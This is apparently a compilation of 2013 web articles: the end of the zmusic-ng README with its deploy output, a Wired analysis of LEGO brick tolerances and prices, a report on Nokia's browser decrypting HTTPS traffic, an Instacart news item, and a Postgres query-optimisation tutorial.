The upload target uploads the relevant portions of the project to SERVER_UPLOAD_PATH. The deploy target first executes the upload target, then copies files from SERVER_UPLOAD_PATH to SERVER_DEPLOY_PATH with the proper permissions, and then finally restarts the uwsgi processes.

zmusic-ng $ make deploy

These makefile targets should be used with care, and the makefile itself should be inspected to ensure all commands are correct for custom configurations.

Here is what a full build and deployment looks like:

zx2c4@Thinkpad ~/Projects/zmusic-ng $ make deploy
make[1]: Entering directory `/home/zx2c4/Projects/zmusic-ng/frontend'
 JS js/lib/jquery.min.js
 JS js/lib/underscore.min.js
 JS js/lib/backbone.min.js
 JS js/models/ReferenceCountedModel.min.js
 JS js/models/Song.min.js
 JS js/models/SongList.min.js
 JS js/models/DownloadBasket.min.js
 JS js/views/SongRow.min.js
 JS js/views/SongTable.min.js
 JS js/views/DownloadSelector.min.js
 JS js/controls/AudioPlayer.min.js
 JS js/app.min.js
 CAT js/scripts.min.js
 CSS css/bootstrap.min.css
 CSS css/font-awesome.min.css
 CSS css/page.min.css
 CAT css/styles.min.css
make[1]: Leaving directory `/home/zx2c4/Projects/zmusic-ng/frontend'
 RSYNC music.zx2c4.com:zmusic-ng
 [clipped]
 DEPLOY music.zx2c4.com:/var/www/uwsgi/zmusic
+ umask 027
+ sudo rsync -rim --delete '--filter=P zmusic.db' zmusic-ng/ /var/www/uwsgi/zmusic
 [clipped]
+ sudo chown -R uwsgi:nginx /var/www/uwsgi/zmusic
+ sudo find /var/www/uwsgi/zmusic -type f -exec chmod 640 '{}' ';'
+ sudo find /var/www/uwsgi/zmusic -type d -exec chmod 750 '{}' ';'
+ sudo /etc/init.d/uwsgi.zmusic restart
 * Stopping uWSGI application zmusic ...
 * Starting uWSGI application zmusic ...

Bugs? Comments? Suggestions?

Send all feedback, including git-formatted patches, to Jason@zx2c4.com.

Disclaimer

The author does not condone or promote using this software for redistributing copyrighted works.

License

Copyright (C) 2013 Jason A. Donenfeld. All Rights Reserved.

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.


Why Are LEGO Sets Expensive? | Wired Science | Wired.com


Comments:"Why Are LEGO Sets Expensive? | Wired Science | Wired.com"

URL:http://www.wired.com/wiredscience/2013/01/why-are-lego-sets-expensive/


I’m not sure I would say LEGO blocks are that expensive, but the statement is that they are expensive because they are so well made. Really, this has to at least be partially true. If you take some blocks made in 1970, they still fit with pieces made today. That is quite impressive.

But the real question is: what is the distribution of LEGO sizes? How does this distribution of sizes compare to other toys? The simple way to answer this question is to start measuring a whole bunch of blocks.

Here is the plan. Use a micrometer (the tool, not the unit) to measure the width of 2 bump LEGO blocks. Plot a histogram of the different sizes. Just to be clear, the micrometer is a tool that measures small sizes – around a millimeter to 20 millimeters. This particular one has markings down to 0.01 mm – for my measurements, I will estimate the size to 0.001 millimeters. Oh, one more point. There are lots of pieces that are two LEGO dots. For this data, I am mostly using 2 x 1 and 2 x 2 pieces. I will assume that both have the same size in the 2 bump direction.

Here is my first set of data.

These 88 measurements have an average of 15.814 mm with a standard deviation of 0.0265 mm.

What about older LEGO pieces?

Fortunately, I found one of my original sets from the late 70s.


I even have the instructions. Even though I’m not sure how old these are, they have to be at least 30 years old. Here are some 2 bump pieces from the 70s vs modern pieces.

The pieces from the 70s have an average of 15.819 mm with a standard deviation of 0.026 mm. Without doing any formal statistical tests, this seems close enough to being about the same distributions.

How about something else? What if I just look at 2 x 2 LEGO blocks? For these blocks, I can get a measurement of the width in two different ways (length and width). I can call one dimension “x” and the other “y”. Here is a plot of x vs. y measurements for square blocks.

Maybe that wasn’t such a great plot. What does it show? I guess the only thing I can say about this is that there doesn’t appear to be a systematic error relating the two sides of a 2 x 2 block. If a block is a tiny bit smaller in one dimension, it isn’t necessarily smaller in the other dimension.

What About Other Objects?

Do other things have high precision parts too? Before I show any data, let me plot some different data. Instead of plotting just the width of different objects, I am going to plot the distribution of the width divided by the mean width. This way I can make a comparison between objects of different size.

I found three different sets of objects to measure.

There are these wooden planks that are used for building stuff. Then I have two different types of “counting” blocks used for math stuff. I will combine all the 2 bump LEGO blocks together since they seem to be from a similar distribution.

Here is the distribution of the 4 different types of objects. I only plotted the 70s LEGO pieces since they had a number comparable to the other objects.

Clearly the wooden planks have a much wider distribution than the rest of the objects. Let me remove the wooden plank data and plot just the other stuff so it will be easier to make a comparison.

I probably need more data, but these seem to be built with around the same level of precision. Honestly, I don’t know much about plastic manufacturing – but the LEGO blocks appear to be created from harder plastic. Maybe this would lead them to maintain their size over a long period of time. Unfortunately, I didn’t have old math blocks to compare to newer blocks.

Price Per Piece of LEGO

This is older data from a previous post, but I like it so much I decided to include it here also. Basically, I looked at the price of different LEGO sets along with their pieces. The cool thing about all of the LEGO sets is that the number of pieces is always listed. BOOM. Instant graph (well, instant except for looking up all the prices).

Remember, these are 2009 prices but I think the same idea holds true.

This looks linear enough to fit a function. This is what you get.

About 10 cents per LEGO piece. If you had a set with no pieces in it, it would still cost 6 dollars. Yes, there are some sets that don’t fit too well – but for the most part this works nicely.

Nokia: Yes, we decrypt your HTTPS data, but don’t worry about it — Tech News and Analysis


Comments:" Nokia: Yes, we decrypt your HTTPS data, but don’t worry about it — Tech News and Analysis "

URL:http://gigaom.com/2013/01/10/nokia-yes-we-decrypt-your-https-data-but-dont-worry-about-it/


Nokia has confirmed reports that its Xpress Browser decrypts data that flows through HTTPS connections – that includes the connections set up for banking sessions, encrypted email and more. However, it insists that there’s no need for users to panic because it would never access customers’ encrypted data.

The confirmation-slash-denial comes after security researcher Gaurang Pandya, who works for Unisys Global Services in India, detailed on his personal blog how browser traffic from his Series 40 ‘Asha’ phone was getting routed via Nokia’s servers. So far, so Opera Mini: after all, the whole point of using a proxy browser such as this is to compress traffic so you can save on data and thereby cash. This is particularly handy for those on constricted data plans or pay-by-use data, as those using the low-end Series 40 handsets on which the browser is installed by default (it used to be known as the ‘Nokia Browser for Series 40′) are likely to be.

However, it was Pandya’s second post on the subject that caused some alarm. Unlike the first, which looked at general traffic, the Wednesday post specifically examined Nokia’s treatment of HTTPS traffic. It found that such traffic was indeed also getting routed via Nokia’s servers. Crucially, Pandya said that Nokia had access to this data in unencrypted form:

“From the tests that were preformed, it is evident that Nokia is performing Man In The Middle Attack for sensitive HTTPS traffic originated from their phone and hence they do have access to clear text information which could include user credentials to various sites such as social networking, banking, credit card information or anything that is sensitive in nature.”

Pandya pointed out how this potentially clashes with Nokia’s privacy statement, which claims: “we do not collect any usernames or passwords or any related information on your purchase transactions, such as your credit card number during your browsing sessions”.

So, does it clash?

Nokia came back today with a statement on the matter, in which it stressed that it takes the privacy and security of its customers and their data very seriously, and reiterated the point of the Xpress Browser’s compression capabilities, namely so that “users can get faster web browsing and more value out of their data plans”.

“Importantly, the proxy servers do not store the content of web pages visited by our users or any information they enter into them,” the company said. “When temporary decryption of HTTPS connections is required on our proxy servers, to transform and deliver users’ content, it is done in a secure manner. Nokia has implemented appropriate organizational and technical measures to prevent access to private information. Claims that we would access complete unencrypted information are inaccurate.”

To paraphrase: we decrypt your data, but trust us, we don’t peek. Which is, in a way, fair enough. After all, they need to decrypt the data in order to de-bulk it.

The issue here seems to be around how Nokia informs – or fails to inform – its customers of what’s going on. For example, look at Opera. The messaging around Opera Mini is pretty clear: the browser’s FAQs spell out how it routes traffic. Although you can find out about the Xpress Browser’s equivalent functionality with a bit of online searching, it’s far less explicit to the average user. And this is particularly unfortunate given that the browser is installed by default — people won’t necessarily choose it based on those data-squeezing chops.

And it looks like Nokia belatedly recognizes that fact. The statement continued:

“We aim to be completely transparent on privacy practices. As part of our policy of continuous improvement we will review the information provided in the mobile client in case this can be improved.”

The moral of the story is that those who want absolute security in their mobile browsing should probably steer clear of browsers that compress to cut down on data. Even if Nokia isn’t tapping into that data – and there is no reason to suspect that it is – the very existence of that feature will be a turn-off for the paranoid, and reasonably so. And that’s why Nokia should be up-front about such things.

UPDATE: A kind soul has reminded me that, unlike Xpress Browser and Opera Mini, two other services that also do the compression thing leave HTTPS traffic unperturbed, namely Amazon with its Silk browser and Skyfire. This is arguably how things should be done, although it does of course mean that users don’t get speedier loading and so on on HTTPS pages.


Instacart Adds Trader Joe's To Service


Comments:"Instacart Adds Trader Joe's To Service"

URL:http://thenextweb.com/apps/2013/01/10/grocery-delivery-startup-instacart-adds-trader-joes-to-its-service-allowing-for-on-demand-two-buck-chuck/?utm_source=Twitter&utm_content=Grocery%20delivery%20startup%20Instacart%20adds%20Trader%20Joes%20to%20its%20service,%20allowing%20for%20on-demand%20Two%20Buck%20Chuck&awesm=tnw.to_c0U3e&utm_medium=share%20button&utm_campaign=social%20media


Update: Unbeknownst to us at the time of posting, Instacart has temporarily suspended alcohol sales through its service. Thus, the title of this post was a bit off: you can’t yet buy wine from Trader Joe’s. The company told TNW that it is an issue it is working to solve, and that the ability should be back in a few weeks’ time. We apologize for the confusion. 

Today Instacart begins to roll out support for Trader Joe’s chain of stores to its grocery delivery service. Users that have had their accounts activated to support the new products will be able to toggle between Safeway and Trader Joe’s, giving them the option to purchase from one, or both of the providers.

Given that Instacart is getting its start in the Bay Area, the addition of the new grocery store is non-trivial: many in this part of California swear by it.

We spoke with Instacart’s founder Apoorva Mehta, who noted that “one of the features our customers have repeatedly asked for is the ability to shop at Trader Joe’s.” The company is especially proud of its blended cart system, by which users can buy items from either grocery store in one move, and have them delivered on its scheduled one or three hour deliveries.

Instacart’s model is finding firm footing in its trial markets, telling TNW somewhat elliptically that its economics are functional, and that its growth rates are strong. The company also noted that its attempts at paid marketing produced slim results, and that word of mouth marketing is instead propelling the firm forward.

I’m usually skeptical of such claims, but as I took part in the very same activity in my first review of the company, I must admit the claim’s plausibility.

Instacart is a somewhat interesting startup as it is working in a space where so many have failed, often spectacularly, such as WebVan. The company appears to be succeeding through simple pricing, a functional interface across platforms that makes it simple to use, and economics that make it viable in the long-term, not depending on massive scale to produce efficiencies.

For fun, here’s what your account will look like once it is approved for Trader Joe’s support. The top image is from Safeway.

Versus:

Two buck chuck on demand? Hats off. For more on Instacart, TNW’s past coverage is required reading.

Top Image Credit: Khamis Hammoudeh

More on Postgres Performance - Craig Kerstiens


Comments:"More on Postgres Performance - Craig Kerstiens"

URL:http://craigkerstiens.com/2013/01/10/more-on-postgres-performance/


If you missed my previous post on Understanding Postgres Performance its a great starting point. On this particular post I’m going to dig in to some real life examples of optimizing queries and indexes.

It all starts with stats

I wrote about some of the great new features in Postgres 9.2 in the recent announcement on support of Postgres 9.2 on Heroku. One of those awesome features is pg_stat_statements. It’s not commonly known how much information Postgres keeps about your database (beyond the data of course), but in reality it keeps a great deal, ranging from basic stuff like table size to the cardinality of joins and the distribution of indexes. With pg_stat_statements, it also keeps a normalized record of the queries that are run.

First you’ll want to turn on pg_stat_statements:

CREATE EXTENSION pg_stat_statements;

This means it would record both:

SELECT id 
FROM users
WHERE email LIKE 'craig@heroku.com';

and

SELECT id 
FROM users
WHERE email LIKE 'craig.kerstiens@gmail.com';

To a normalized form which looks like this:

SELECT id 
FROM users
WHERE email LIKE ?;

Understanding them from afar

While Postgres collects a great deal of this information, dissecting it into something useful is sometimes more of a mystery than it should be. This simple query will show a few very key pieces of information that allow you to begin optimizing:

SELECT 
 (total_time / 1000 / 60) as total_minutes, 
 (total_time/calls) as average_time, 
 query 
FROM pg_stat_statements 
ORDER BY 1 DESC 
LIMIT 100;

The above query shows three key things:

  • The total time a query has occupied against your system, in minutes
  • The average time it takes to run, in milliseconds
  • The query itself

Giving an output something like:

 total_minutes | average_time | query
------------------+------------------+------------------------------------------------------------
 295.761165833319 | 10.1374053278061 | SELECT id FROM users WHERE email LIKE ?
 219.138564283326 | 80.24530822355305 | SELECT * FROM address WHERE user_id = ? AND current = True
(2 rows)

What to optimize

A general rule of thumb is that most of your very common queries that return one record or a small set of records should return in ~ 1 ms. In some cases there may be queries that regularly run in 4-5 ms, but in most cases ~ 1 ms or less is ideal.

To pick where to begin, I usually try to strike some balance between total time and a long average time. In this case I’d probably start with the second query: on the first I could likely shave off an order of magnitude, but on the second I’m hopeful to shave off two orders of magnitude, reducing the time spent on that query from a cumulative 220 minutes down to about 2 minutes.

Optimizing

From here you probably want to first read my earlier post on understanding the explain plan. I want to highlight some of this with a more specific case based on the second query above. That second query, run against an example data set, does have an index on user_id, and yet query times are still high. To start to get an idea of why, I would run:

EXPLAIN ANALYZE
SELECT * 
FROM address 
WHERE user_id = 245 
 AND current = True

This would yield results:

 QUERY PLAN
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Aggregate (cost=4690.88..4690.88 rows=1 width=0) (actual time=519.288..519.289 rows=1 loops=1)
 -> Nested Loop (cost=0.00..4690.66 rows=433 width=0) (actual time=15.302..519.076 rows=213 loops=1)
 -> Index Scan using idx_address_userid on address (cost=0.00..232.52 rows=23 width=4) (actual time=10.143..62.822 rows=1 loops=8)
 Index Cond: (user_id = 245)
 Filter: current
 Rows Removed by Filter: 14
 Total runtime: 219.428 ms
(1 rows)

Hopefully, having read the earlier detail on query plans, this is not too overwhelming: we can see that it is using an index as expected. The difference is that it has to fetch 15 different rows from the index and then discard the bulk of them. The number of rows discarded is shown by the line:

Rows Removed by Filter: 14

This is just one more of the many improvements in Postgres 9.2 alongside pg_stat_statements.

To further optimize this we would create either a conditional or a composite index. A conditional index would cover only rows where current = true, whereas a composite index would index both columns. A conditional index is commonly more valuable when the filtered column takes only a small set of values, while a composite index is better when the values are highly variable. Creating the conditional index:

CREATE INDEX CONCURRENTLY idx_address_userid_current ON address(user_id) WHERE current = True;

We can then see the query plan is now even further improved as we’d hope:

EXPLAIN ANALYZE
SELECT * 
FROM address 
WHERE user_id = 245 
 AND current = True
 QUERY PLAN
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Aggregate (cost=4690.88..4690.88 rows=1 width=0) (actual time=519.288..519.289 rows=1 loops=1)
 -> Index Scan using idx_address_userid_current on address (cost=0.00..232.52 rows=23 width=4) (actual time=10.143..62.822 rows=1 loops=8)
 Index Cond: ((user_id = 245) AND (current = True))
 Total runtime: .728 ms
(1 rows)

For further reading, give Greg Smith’s Postgres High Performance a read
